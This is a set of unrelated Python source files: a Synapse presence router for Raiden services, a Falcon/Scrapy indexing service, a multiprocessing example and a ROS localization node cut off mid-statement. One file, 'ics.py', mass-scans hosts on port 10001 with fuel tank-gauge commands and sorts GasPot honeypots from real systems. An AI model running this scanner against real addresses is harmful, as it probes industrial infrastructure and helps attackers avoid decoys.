import logging import threading import time from dataclasses import dataclass from enum import Enum from typing import Dict, Iterable, List, Literal, Optional, Set, Union, cast from urllib.parse import urlparse from eth_typing import Address from eth_utils import encode_hex, to_canonical_address, to_checksum_address from hexbytes import HexBytes from requests.exceptions import ReadTimeout from synapse.config import ConfigError from synapse.handlers.presence import UserPresenceState from synapse.module_api import ModuleApi, run_in_background from synapse.types import UserID from web3 import Web3 from web3.exceptions import BlockNotFound, ExtraDataLengthError from raiden_contracts.constants import CONTRACT_SERVICE_REGISTRY, CONTRACTS_VERSION from raiden_contracts.contract_manager import get_contracts_deployment_info from raiden_contracts.utils.type_aliases import ChainID from raiden_synapse_modules.presence_router.blockchain_support import ( install_filters, read_initial_services_addresses, setup_contract_from_address, ) log = logging.getLogger(__name__) class WorkerType(Enum): MAIN = None FEDERATION_SENDER = "synapse.app.federation_sender" OTHER = "_other" @dataclass class PFSPresenceRouterConfig: service_registry_address: Optional[Address] ethereum_rpc: str blockchain_sync: int class PFSPresenceRouter: """An implementation of synapse.presence_router.PresenceRouter. Supports routing all presence to all registered service providers. Basic flow: - on startup - read all registered services - check for local service users - send ALL presences to local service users - every config.blockchain_sync_seconds - check for new filter hits (RegisteredService, Block) - on RegisteredService - update registered_services - recompile local service users - send ALL presences to new service users - on Block - check block.timestamp against next_expiry - on expired services - update registered_services - recompile local service users Args: config: A configuration object. module_api: An instance of Synapse's ModuleApi. 
""" def __init__(self, config: PFSPresenceRouterConfig, module_api: ModuleApi): self._module_api: ModuleApi = module_api self._config: PFSPresenceRouterConfig = config self.web3 = self.setup_web3() service_registry_address = self._config.service_registry_address if service_registry_address is None: chain_id = ChainID(self.web3.eth.chain_id) deployment_data = get_contracts_deployment_info( chain_id=chain_id, version=CONTRACTS_VERSION, ) assert ( deployment_data is not None ), f"Could not load deployment data for chain {chain_id}" service_registry_address = to_canonical_address( deployment_data["contracts"][CONTRACT_SERVICE_REGISTRY]["address"] ) self.registry = setup_contract_from_address(service_registry_address, self.web3) self.registered_services: Dict[Address, int] = read_initial_services_addresses( self.registry ) if len(self.registered_services): self.next_expiry = min(self.registered_services.values()) else: self.next_expiry = 0 self.local_users: List[UserID] = [] self.update_local_users() if self.worker_type is WorkerType.FEDERATION_SENDER: # The initial presence update only needs to be sent from within the # `federation_sender` worker process run_in_background( self.send_current_presences_to, self.local_users, ) block_filter, event_filter = install_filters(self.registry) self.block_filter = block_filter self.event_filter = event_filter thread = threading.Thread(target=self._check_filters, name="_check_filters") thread.start() log.debug("Module setup done") @property def worker_type(self) -> WorkerType: """Return the type of worker we're running in""" try: return WorkerType(self._module_api._hs.config.worker_app) except ValueError: return WorkerType.OTHER @staticmethod def parse_config(config_dict: dict) -> PFSPresenceRouterConfig: """Parse a configuration dictionary from the homeserver config, do some validation and return a typed PFSPresenceRouterConfig. Args: config_dict: The configuration dictionary. Returns: A validated config object. """ try: blockchain_sync = int(config_dict.get("blockchain_sync_seconds", "15")) except ValueError: raise ConfigError("`blockchain_sync_seconds` needs to be an integer") service_registry_address = config_dict.get("service_registry_address") if service_registry_address is not None: try: service_registry_address = to_canonical_address( to_checksum_address(service_registry_address) ) except (TypeError, ValueError): raise ConfigError("`service_registry_address` is not a valid address") try: ethereum_rpc = config_dict.get("ethereum_rpc") parsed_ethereum_rpc = urlparse(ethereum_rpc) if not all([parsed_ethereum_rpc.scheme, parsed_ethereum_rpc.netloc]): raise ValueError() except ValueError: raise ConfigError("`ethereum_rpc` is not properly configured") return PFSPresenceRouterConfig( service_registry_address, ethereum_rpc, blockchain_sync # type: ignore ) async def get_users_for_states( self, state_updates: Iterable[UserPresenceState], ) -> Dict[str, Set[UserPresenceState]]: """Given an iterable of user presence updates, determine where each one needs to go. Args: state_updates: An iterable of user presence state updates. Returns: A dictionary of user_id -> set of UserPresenceState that the user should receive. """ destination_users: Dict[str, Set[UserPresenceState]] = {} for user in self.local_users: destination_users[user] = set(state_updates) return destination_users async def get_interested_users(self, user_id: str) -> Union[Set[str], Literal["ALL"]]: """ Retrieve a list of users that `user_id` is interested in receiving the presence of. 
This will be in addition to those they share a room with. Optionally, the literal str "ALL" can be returned to indicate that this user should receive all incoming local and remote presence updates. Note that this method will only be called for local users. Args: user_id: A user requesting presence updates. Returns: A set of user IDs to return additional presence updates for, or "ALL" to return presence updates for all other users. """ if user_id in self.local_users: return "ALL" return set() def setup_web3(self) -> Web3: provider = Web3.HTTPProvider(self._config.ethereum_rpc) web3 = Web3(provider) try: web3.eth.getBlock("latest") except ExtraDataLengthError: from web3.middleware import geth_poa_middleware web3.middleware_onion.inject(geth_poa_middleware, layer=0) return web3 def _check_filters(self) -> None: while True: self._check_filters_once() time.sleep(self._config.blockchain_sync) def _check_filters_once(self) -> None: log.debug("Checking filters.") start = time.time() try: receipts = self.block_filter.get_new_entries() log.info(f"Got new block entries in {time.time() - start} seconds") registered_services = self.event_filter.get_new_entries() log.info(f"Got new event entries in {time.time() - start} seconds") except ReadTimeout: log.error( f"Connection error: check_filters timeout after {time.time() - start} seconds" ) return for receipt in receipts: blockhash = cast(HexBytes, receipt) self.on_new_block(blockhash) for registered_service in registered_services: self.on_registered_service( registered_service.args.service, # type: ignore registered_service.args.valid_till, # type: ignore ) self.last_update = time.time() log.info(f"Filters checked in {time.time() - start} seconds") async def send_current_presences_to(self, users: List[UserID]) -> None: """Send all presences to users.""" start = time.time() log.debug(f"Sending presences to {len(users)} users") await self._module_api.send_local_online_presence_to(users) log.info(f"Presences updated in {time.time() - start} seconds") def on_registered_service(self, service_address: Address, expiry: int) -> None: """Called, when there is a new RegisteredService event on the blockchain.""" # service_address is already known, update the expiry log.debug("New registered service {to_checksum_address(service_address)}") if service_address in self.registered_services: self.registered_services[service_address] = expiry # new service, add and send current presences else: self.registered_services[service_address] = expiry local_user = self.to_local_user(service_address) if local_user is not None: self.local_users.append(local_user) if self.worker_type is WorkerType.FEDERATION_SENDER: # The initial presence update only needs to be sent from within the # `federation_sender` worker process run_in_background( self.send_current_presences_to, [local_user], ) if len(self.registered_services): self.next_expiry = min(self.registered_services.values()) def on_new_block(self, blockhash: HexBytes) -> None: """Called, when there is a new Block on the blockchain.""" log.debug(f"New block {encode_hex(blockhash)}.") start = time.time() try: timestamp: int = self.web3.eth.getBlock(blockhash)["timestamp"] log.info(f"getBlock finished in {time.time() - start} seconds") if timestamp > self.next_expiry: self.expire_services(timestamp) if len(self.registered_services): self.next_expiry = min(self.registered_services.values()) except BlockNotFound: log.error(f"getBlock failed after {time.time() - start} seconds") log.debug(f"Block {encode_hex(blockhash)} not found.") def 
expire_services(self, timestamp: int) -> None: registered_services: Dict[Address, int] = {} for address, expiry in self.registered_services.items(): if expiry > timestamp: registered_services[address] = expiry self.registered_services = registered_services self.update_local_users() def update_local_users(self) -> None: """Probe all `self.registered_services` addresses for a local UserID and update `self.local_users` accordingly. """ local_users: List[UserID] = [] for address in self.registered_services.keys(): candidate = self.to_local_user(address) if candidate is not None: local_users.append(candidate) log.debug(f"Now {len(local_users)} users registered for presence updates.") self.local_users = local_users def to_local_user(self, address: Address) -> Optional[UserID]: """Create a UserID for a local user from a registered service address.""" log.debug(f"Creating UserID for address {to_checksum_address(address)}") user_id = self._module_api.get_qualified_user_id(str(to_checksum_address(address)).lower()) return user_id
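# --- Illustrative sketch (not part of the module above) ---
# expire_services() and on_new_block() maintain the invariant that
# `next_expiry` is the minimum expiry among still-registered services
# (0 when none remain). The same bookkeeping with plain dicts and
# sketch-local names only:
def _sketch_expire(registered_services, block_timestamp):
    still_valid = {
        address: expiry
        for address, expiry in registered_services.items()
        if expiry > block_timestamp
    }
    next_expiry = min(still_valid.values()) if still_valid else 0
    return still_valid, next_expiry


if __name__ == "__main__":
    # The service expiring at 100 is dropped once a block timestamp passes it.
    print(_sketch_expire({"0xaa": 100, "0xbb": 200}, 150))  # ({'0xbb': 200}, 200)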
ics.py
#!/usr/bin/python # -*- coding: utf-8 -*- import argparse import sys import threading import time import socket import xmltodict import json # from lib.payload.scanner.service.engine import recv_all COMMANDS = [ { "\x01I30100\n": ["9999FF1B"] }, { "\x01I20100\n": ["I20100", "IN-TANK INVENTORY"] } ] # https://github.com/sjhilt/GasPot/blob/master/config.ini.dist DEFAULT_SIGNATURES = [ "EXXON STATION\n 12 Fake St\n Anytown, MO 12346", "FUEL COOP", "SHELL STATION", "AMOCO FUELS", "MOBIL STATION", "MARATHON GAS", "CHEVRON STATION", "CITGO FUELS", "BP FUELS", "PILOT TRUCK STOP", "FLYING J TRUCK STOP", "LOVES FUEL STATION", "SINCLAIR FUEL", "VICTORY OIL", "CONOCO FUELS", "76 OIL", "TEXACO STATION", "PETRO-CANADA", "TOTAL PETROL", "HEM PETROL", "ARAL PETROL", "OBERT 24h", "AGIP PETROL", "ROMPETROL STATION", "PETRON STATION", "CIRCLE K STATION", "LUK OIL", "MURPHY OIL"] DEFAULT_PRODUCTS = ["SUPER", "UNLEAD", "DIESEL", "PREMIUM"] def recv_all(s, limit=4196): """ receive all data from a socket Args: s: python socket limit: limit size to get response Returns: response or b"" """ response = "" while len(response) < limit: try: r = s.recv(1) if r != b"": response += r.decode() else: break except Exception as _: break return response def info(msg, response=None, output=None): sys.stdout.write("[+] " + msg + "\n") if response and output: f = open(output, "a") f.write(json.dumps(response) + "\n") f.close() def sort_output(output, target_length): data = list(set(open(output).read().rsplit("\n"))) data_json = [] for res in data: if res.startswith("{"): data_json.append(json.loads(res)) info("{0}/{1} possible honeypot founds".format(len(data_json), target_length)) f = open(output, "w") f.write(json.dumps(data_json)) f.close() def first_ics_connect(target, port, timeout, output): __JSON_STRUCTURE = {"host": target} response = "" for CMD in COMMANDS: for CMD_NAME in CMD: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) s.connect((target, port)) s.send(CMD_NAME) response = recv_all(s, limit=1000000) FLAG = True for RES in CMD[CMD_NAME]: if RES not in response: FLAG = False __JSON_STRUCTURE[CMD_NAME] = FLAG except Exception as _: __JSON_STRUCTURE[CMD_NAME] = False if __JSON_STRUCTURE["\x01I20100\n"]: __JSON_STRUCTURE["I20100_RESPONSE"] = response FLAG = False for SIG in DEFAULT_SIGNATURES: if SIG in response: FLAG = True __JSON_STRUCTURE["DEFAULT_SIGNATURES"] = FLAG FLAG = True for PRD in DEFAULT_PRODUCTS: if PRD not in response: FLAG = False __JSON_STRUCTURE["DEFAULT_PRODUCTS"] = FLAG info("possible found honeypot {0}".format(target), response=__JSON_STRUCTURE, output=output) return def read_targets(filename): try: data = open(filename, "rb").read() except Exception as _: sys.exit(info("cannot open the file[{0}]".format(filename))) if filename.endswith(".xml"): loaded_data = json.loads(json.dumps(xmltodict.parse(data))) hosts = [] try: for tag in loaded_data["nmaprun"]["host"]: hosts.append(json.loads(json.dumps(json.loads(json.dumps(tag))["address"]))["@addr"]) except Exception as _: sys.exit(info("some error occurred while parsing targets from {0}".format(filename))) elif filename.endswith(".txt"): hosts = list(set(data.rsplit())) else: sys.exit(info("file extension not supported. 
(only .txt and .xml)")) if not len(hosts): sys.exit(info("no targets found in this file {0}".format(filename))) return hosts def clear_threads(threads): for thread in threads: try: thread._Thread__stop() except: pass def start(): parser = argparse.ArgumentParser(prog="ICS Hunter", add_help=False) engineOpt = parser.add_argument_group("Options") engineOpt.add_argument("-h", "--help", action="store_true", default=False, dest="help_menu", help="show this help menu") engineOpt.add_argument("-i", "--targets", action="store", dest="target", default=None, help="input targets (e.g. masscan-gaspot.xml, lists.txt)") engineOpt.add_argument("-p", "--port", action="store", dest="port", default=10001, type=int, help="port number") engineOpt.add_argument("-t", "--threads", action="store", dest="threads", default=500, type=int, help="max threads number") engineOpt.add_argument("-T", "--timeout", action="store", dest="timeout", default=3, type=int, help="timeout seconds") engineOpt.add_argument("-o", "--output", action="store", dest="output", default="results.json", help="output filename (e.g. results.json)") engineOpt.add_argument("-a", "--alert", action="store", dest="alert", default=1000, type=int, help="alert every x thread to show position") args = parser.parse_args() if len(sys.argv) <= 1 or "-h" in sys.argv or "--help" in sys.argv: parser.print_help() targets = read_targets(args.target) try: f = open(args.output, "w") f.write("") f.close() except: sys.exit(info("{0} is not writable!".format(args.output))) n = 1 BREAK = False threads = [] for target in targets: if n % args.alert is 0: info(str(n) + "/" + str(len(targets)) + "->" + target) thread = threading.Thread(target=first_ics_connect, args=(target, args.port, args.timeout, args.output)).start() threads.append(thread) while 1: try: if not threading.activeCount() - 1 >= args.threads: break time.sleep(0.01) except KeyboardInterrupt: BREAK = True break if BREAK: break n += 1 if int(n % 2000) is 0: time.sleep(args.timeout + 1) info("clearing cache") clear_threads(threads) info("cache cleaned") threads = [] time.sleep(args.timeout + 1) info("clearning cache") clear_threads(threads) info("cache cleaned") time.sleep(args.timeout + 1) sort_output(args.output, len(targets)) sys.exit(0) if __name__ == "__main__": start()
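# --- Hedged alternative sketch (not part of the script above) ---
# In start() above, `thread = threading.Thread(...).start()` stores the return
# value of start(), which is always None, so the `threads` list never holds
# real Thread objects and clear_threads() has nothing to stop. A bounded pool
# via concurrent.futures (Python 3, or the `futures` backport) sidesteps that
# bookkeeping; the 500-worker default here mirrors the script's --threads default.
from concurrent.futures import ThreadPoolExecutor


def scan_targets_pooled(targets, port, timeout, output, max_workers=500):
    """Probe every target with first_ics_connect() using a fixed-size pool."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        for target in targets:
            pool.submit(first_ics_connect, target, port, timeout, output)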
multiprocessing_import_main.py
import multiprocessing
import multiprocessing_import_worker

if __name__ == "__main__":
    jobs = []
    for i in range(5):
        p = multiprocessing.Process(target=multiprocessing_import_worker.worker)
        jobs.append(p)
        p.start()
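# --- Illustrative sketch (not part of the example above) ---
# The example starts five processes but never waits for them; a variant that
# joins each child before returning, reusing the module-level imports and the
# same companion module `multiprocessing_import_worker` exposing worker():
def run_workers(count=5):
    jobs = [
        multiprocessing.Process(target=multiprocessing_import_worker.worker)
        for _ in range(count)
    ]
    for job in jobs:
        job.start()
    for job in jobs:
        job.join()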
service.py
import falcon import scrapy import settings import logging import threading import subprocess import crawlthread import urllib2 from multiprocessing import Process, Queue from elasticsearch import Elasticsearch, helpers from scrapy.crawler import CrawlerRunner from scrapy.utils.log import configure_logging from twisted.internet import reactor from scrapy.crawler import CrawlerProcess from philomathspider import PhilomathSpider es = Elasticsearch(hosts = [settings.SEARCH_HOST]) class Philomath: def on_post(self, req, resp): if not es.indices.exists(settings.INDEX_NAME): es_request_body = { "settings" : { "number_of_shards": 1, "number_of_replicas": 0 } } es_response = es.indices.create(index = settings.INDEX_NAME, body = es_request_body) configure_logging() url = req.stream.read().decode('utf-8') decodedurl = urllib2.unquote(url).decode('utf8') already_indexed = es.exists(index=settings.INDEX_NAME,doc_type='philomathitem',id=decodedurl) if not already_indexed: logging.warning('not indexed') crawlerProcess=Process(target=crawlthread.crawl, kwargs={"url" : decodedurl}) crawlerProcess.start() crawlerProcess.join() else: logging.warning('already indexed') resp.status = falcon.HTTP_200 api = falcon.API() api.add_route('/url', Philomath())
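# --- Illustrative sketch (not part of the service above) ---
# falcon.API() instances are plain WSGI callables, so the `api` object above
# can be served for local testing with the stdlib WSGI server; the port (8000)
# is an assumption, not something this module configures. A production setup
# would normally sit behind a dedicated WSGI server such as gunicorn instead.
if __name__ == '__main__':
    from wsgiref.simple_server import make_server
    httpd = make_server('', 8000, api)
    httpd.serve_forever()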
dal_ros_aml.py
#!/usr/bin/env python from __future__ import print_function import rospy import actionlib from move_base_msgs.msg import * from utils import * from random_box_map import * from sensor_msgs.msg import LaserScan from nav_msgs.msg import Odometry from geometry_msgs.msg import PoseStamped, Twist from tf.transformations import * import numpy as np from scipy import ndimage, interpolate from collections import OrderedDict import pdb import glob import os import multiprocessing import errno import re import time import random import cv2 from recordtype import recordtype import torch import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable from torch.optim.lr_scheduler import ReduceLROnPlateau, StepLR import torchvision from torchvision import transforms from torchvision.models.densenet import densenet121, densenet169, densenet201, densenet161 # from logger import Logger from copy import deepcopy from networks import policy_A3C from resnet_pm import resnet18, resnet34, resnet50, resnet101, resnet152 from torchvision.models.resnet import resnet18 as resnet18s from torchvision.models.resnet import resnet34 as resnet34s from torchvision.models.resnet import resnet50 as resnet50s from torchvision.models.resnet import resnet101 as resnet101s from torchvision.models.resnet import resnet152 as resnet152s from networks import intrinsic_model import math import argparse from datetime import datetime from maze import generate_map import matplotlib.pyplot as plt import matplotlib.colors as cm from matplotlib.patches import Wedge import matplotlib.gridspec as gridspec class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def shift(grid, d, axis=None, fill = 0.5): grid = np.roll(grid, d, axis=axis) if axis == 0: if d > 0: grid[:d,:] = fill elif d < 0: grid[d:,:] = fill elif axis == 1: if d > 0: grid[:,:d] = fill elif d < 0: grid[:,d:] = fill return grid def softmax(w, t = 1.0): e = np.exp(np.array(w) / t) dist = e / np.sum(e) return dist def softermax(w, t = 1.0): w = np.array(w) w = w - w.min() + np.exp(1) e = np.log(w) dist = e / np.sum(e) return dist def normalize(x): if x.min() == x.max(): return 0.0*x x = x-x.min() x = x/x.max() return x Pose2d = recordtype("Pose2d", "theta x y") Grid = recordtype("Grid", "head row col") class Lidar(): def __init__(self, ranges, angle_min, angle_max, range_min, range_max, noise=0): # self.ranges = np.clip(ranges, range_min, range_max) self.ranges = np.array(ranges) self.angle_min = angle_min self.angle_max = angle_max num_data = len(self.ranges) self.angle_increment = (self.angle_max-self.angle_min)/num_data #math.increment self.angles_2pi= np.linspace(angle_min, angle_max, len(ranges), endpoint=True) % (2*np.pi) idx = np.argsort(self.angles_2pi) self.ranges_2pi = self.ranges[idx] self.angles_2pi = self.angles_2pi[idx] class LocalizationNode(object): def __init__(self, args): self.skip_to_end = False # self.wait_for_scan = False self.scan_once = False self.scan_bottom_once = False self.scan_on = False self.scan_ready = False self.scan_bottom_ready = False self.wait_for_move = False self.robot_pose_ready = False self.args = args self.rl_test = False self.start_time = time.time() if (self.args.use_gpu) > 0 and torch.cuda.is_available(): self.device = torch.device("cuda" ) torch.set_default_tensor_type(torch.cuda.FloatTensor) else: self.device = torch.device("cpu") torch.set_default_tensor_type(torch.FloatTensor) # 
self.args.n_maze_grids # self.args.n_local_grids # self.args.n_lm_grids self.init_fig = False self.n_maze_grids = None self.grid_rows = self.args.n_local_grids #self.args.map_size * self.args.sub_resolution self.grid_cols = self.args.n_local_grids #self.args.map_size * self.args.sub_resolution self.grid_dirs = self.args.n_headings num_dirs = 1 num_classes = self.args.n_lm_grids ** 2 * num_dirs final_num_classes = num_classes if self.args.n_pre_classes is not None: num_classes = self.args.n_pre_classes else: num_classes = final_num_classes if self.args.pm_net == "none": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = None elif self.args.pm_net == "densenet121": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet121(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 1024 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "densenet169": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet169(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 1664 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "densenet201": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet201(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 1920 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "densenet161": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet161(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 2208 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet18s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet18s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet34s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet34s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet50s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet50s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet101s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet101s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet152s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet152s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = 
nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet18": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet18(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet34": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet34(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet50": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet50(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet101": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet101(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet152": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet152(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features # 2048 else: raise Exception('pm-net required: resnet or densenet') if self.args.RL_type == 0: self.policy_model = policy_A3C(self.args.n_state_grids, 2+self.args.n_state_dirs, num_actions = self.args.num_actions) elif self.args.RL_type == 1: self.policy_model = policy_A3C(self.args.n_state_grids, 1+self.args.n_state_dirs, num_actions = self.args.num_actions) elif self.args.RL_type == 2: self.policy_model = policy_A3C(self.args.n_state_grids, 2*self.args.n_state_dirs, num_actions = self.args.num_actions, add_raw_map_scan = True) self.intri_model = intrinsic_model(self.grid_rows) ## D.P. was here ## # load models if self.args.pm_model is not None: state_dict = torch.load(self.args.pm_model) new_state_dict = OrderedDict() for k,v in state_dict.items(): if 'module.' in k: name = k[7:] else: name = k new_state_dict[name] = v self.perceptual_model.load_state_dict(new_state_dict) print ('perceptual model %s is loaded.'%self.args.pm_model) if self.args.rl_model == "none": self.args.rl_model = None if self.args.rl_model is not None: state_dict = torch.load(self.args.rl_model) new_state_dict = OrderedDict() for k,v in state_dict.items(): if 'module.' 
in k: name = k[7:] else: name = k new_state_dict[name] = v self.policy_model.load_state_dict(new_state_dict) print ('policy model %s is loaded.'%self.args.rl_model) if self.args.ir_model is not None: self.intri_model.load_state_dict(torch.load(self.args.ir_model)) print ('intri model %s is loaded.'%self.args.ir_model) # change n-classes if self.args.n_pre_classes is not None: # resize the output layer: new_num_classes = final_num_classes if "resnet" in self.args.pm_net: self.perceptual_model.fc = nn.Linear(self.perceptual_model.fc.in_features, new_num_classes, bias=True) elif "densenet" in args.pm_net: num_ftrs = self.perceptual_model.classifier.in_features self.perceptual_model.classifier = nn.Linear(num_ftrs, new_num_classes) print ('model: num_classes now changed to', new_num_classes) # data parallel, multi GPU # https://pytorch.org/tutorials/beginner/blitz/data_parallel_tutorial.html if self.device==torch.device("cuda") and torch.cuda.device_count()>0: print ("Use", torch.cuda.device_count(), 'GPUs') if self.perceptual_model != None: self.perceptual_model = nn.DataParallel(self.perceptual_model) self.policy_model = nn.DataParallel(self.policy_model) self.intri_model = nn.DataParallel(self.intri_model) else: print ("Use CPU") if self.perceptual_model != None: self.perceptual_model.to(self.device) self.policy_model.to(self.device) self.intri_model.to(self.device) # if self.perceptual_model != None: if self.args.update_pm_by == "NONE": self.perceptual_model.eval() else: self.perceptual_model.train() if self.args.update_rl: self.policy_model.train() else: self.policy_model.eval() self.min_scan_range, self.max_scan_range = self.args.scan_range #[0.1, 3.5] self.prob=np.zeros((1,3)) self.values = [] self.log_probs = [] self.manhattans = [] self.xyerrs = [] self.manhattan = 0 self.rewards = [] self.intri_rewards = [] self.reward = 0 self.entropies = [] self.gamma = 0.99 self.tau = 0.95 #Are we sure? 
self.entropy_coef = self.args.c_entropy if self.args.update_pm_by == "NONE": self.optimizer_pm = None else: self.optimizer_pm = torch.optim.Adam(list(self.perceptual_model.parameters()), lr=self.args.lrpm) if self.args.schedule_pm: self.scheduler_pm = StepLR(self.optimizer_pm, step_size=self.args.pm_step_size, gamma=self.args.pm_decay) # self.scheduler_lp = ReduceLROnPlateau(self.optimizer_pm, # factor = 0.5, # patience = 2, # verbose = True) models = [] if self.args.update_pm_by=="RL" or self.args.update_pm_by=="BOTH": models = models + list(self.perceptual_model.parameters()) if self.args.update_rl: models = models + list(self.policy_model.parameters()) if self.args.update_ir: models = models + list(self.intri_model.parameters()) if models==[]: self.optimizer = None print("WARNING: no model for RL") else: self.optimizer = torch.optim.Adam(models, lr=self.args.lrrl) if self.args.schedule_rl: self.scheduler_rl = StepLR(self.optimizer, step_size=self.args.rl_step_size, gamma=self.args.rl_decay) self.pm_backprop_cnt = 0 self.rl_backprop_cnt = 0 self.step_count = 0 self.step_max = self.args.num[2] self.episode_count = 0 self.acc_epi_cnt = 0 self.episode_max = self.args.num[1] self.env_count = 0 self.env_max = self.args.num[0] self.env_count = 0 self.next_bin = 0 self.done = False if self.args.verbose>0: print('maps, episodes, steps = %d, %d, %d'%(self.args.num[0], self.args.num[1], self.args.num[2])) self.cx = torch.zeros(1,256) #Variable(torch.zeros(1, 256)) self.hx = torch.zeros(1,256) #Variable(torch.zeros(1, 256)) self.max_grad_norm = 40 map_side_len = 224 * self.args.map_pixel self.xlim = (-0.5*map_side_len, 0.5*map_side_len) self.ylim = (-0.5*map_side_len, 0.5*map_side_len) self.xlim = np.array(self.xlim) self.ylim = np.array(self.ylim) self.map_width_meter = map_side_len # decide maze grids for each env # if self.args.maze_grids_range[0] == None: # pass # else: # self.n_maze_grids = np.random.randint(self.args.maze_grids_range[0],self.args.maze_grids_range[1]) # self.hall_width = self.map_width_meter/self.n_maze_grids # if self.args.thickness == None: # self.obs_radius = 0.25*self.hall_width # else: # self.obs_radius = 0.5*self.args.thickness * self.hall_width self.collision_radius = self.args.collision_radius #0.25 # robot radius for collision self.longest = float(self.grid_dirs/2 + self.grid_rows-1 + self.grid_cols-1) #longest possible manhattan distance self.cell_size = (self.xlim[1]-self.xlim[0])/self.grid_rows self.heading_resol = 2*np.pi/self.grid_dirs self.fwd_step_meters = self.cell_size*self.args.fwd_step self.collision = False self.sigma_xy = self.args.sigma_xy # self.cell_size * 0.05 self.cr_pixels = int(np.ceil(self.collision_radius / self.args.map_pixel)) self.front_margin_pixels = int(np.ceil((self.collision_radius+self.fwd_step_meters) / self.args.map_pixel)) # how many pixels robot moves forward per step. 
self.side_margin_pixels = int(np.ceil(self.collision_radius / self.args.map_pixel)) self.scans_over_map = np.zeros((self.grid_rows,self.grid_cols,360)) self.scan_2d_low_tensor = torch.zeros((1,self.args.n_state_grids, self.args.n_state_grids),device=torch.device(self.device)) self.map_for_LM = np.zeros((self.map_rows, self.map_cols)) self.map_for_pose = np.zeros((self.grid_rows, self.grid_cols),dtype='float') self.map_for_RL = torch.zeros((1,self.args.n_state_grids, self.args.n_state_grids),device=torch.device(self.device)) self.data_cnt = 0 self.explored_space = np.zeros((self.grid_dirs,self.grid_rows, self.grid_cols),dtype='float') self.new_pose = False self.new_bel = False self.bel_list = [] self.scan_list = [] self.target_list = [] self.likelihood = torch.ones((self.grid_dirs,self.grid_rows, self.grid_cols), device=torch.device(self.device), dtype=torch.float) self.likelihood = self.likelihood / self.likelihood.sum() self.gt_likelihood = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) self.gt_likelihood_unnormalized = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) self.belief = torch.ones((self.grid_dirs,self.grid_rows, self.grid_cols),device=torch.device(self.device)) self.belief = self.belief / self.belief.sum() self.prior = self.belief.detach().cpu().numpy() self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() # self.bel_ent = np.log(1.0/(self.grid_dirs*self.grid_rows*self.grid_cols)) self.loss_likelihood = [] # loss for training PM model self.loss_ll=0 self.loss_policy = 0 self.loss_value = 0 self.turtle_loc = np.zeros((self.map_rows,self.map_cols)) self.policy_out = None self.value_out = None self.action_idx = -1 self.action_from_policy = -1 # what to do # current pose: where the robot really is. motion incurs errors in pose self.current_pose = Pose2d(0,0,0) self.live_pose = Pose2d(0,0,0) # updated on-line from cbRobotPose self.odom_pose = Pose2d(0,0,0) # updated from jay1/odom self.map_pose = Pose2d(0,0,0) # updated from jay1/odom and transformed to map coordinates self.goal_pose = Pose2d(0,0,0) self.last_pose = Pose2d(0,0,0) self.perturbed_goal_pose = Pose2d(0,0,0) self.start_pose = 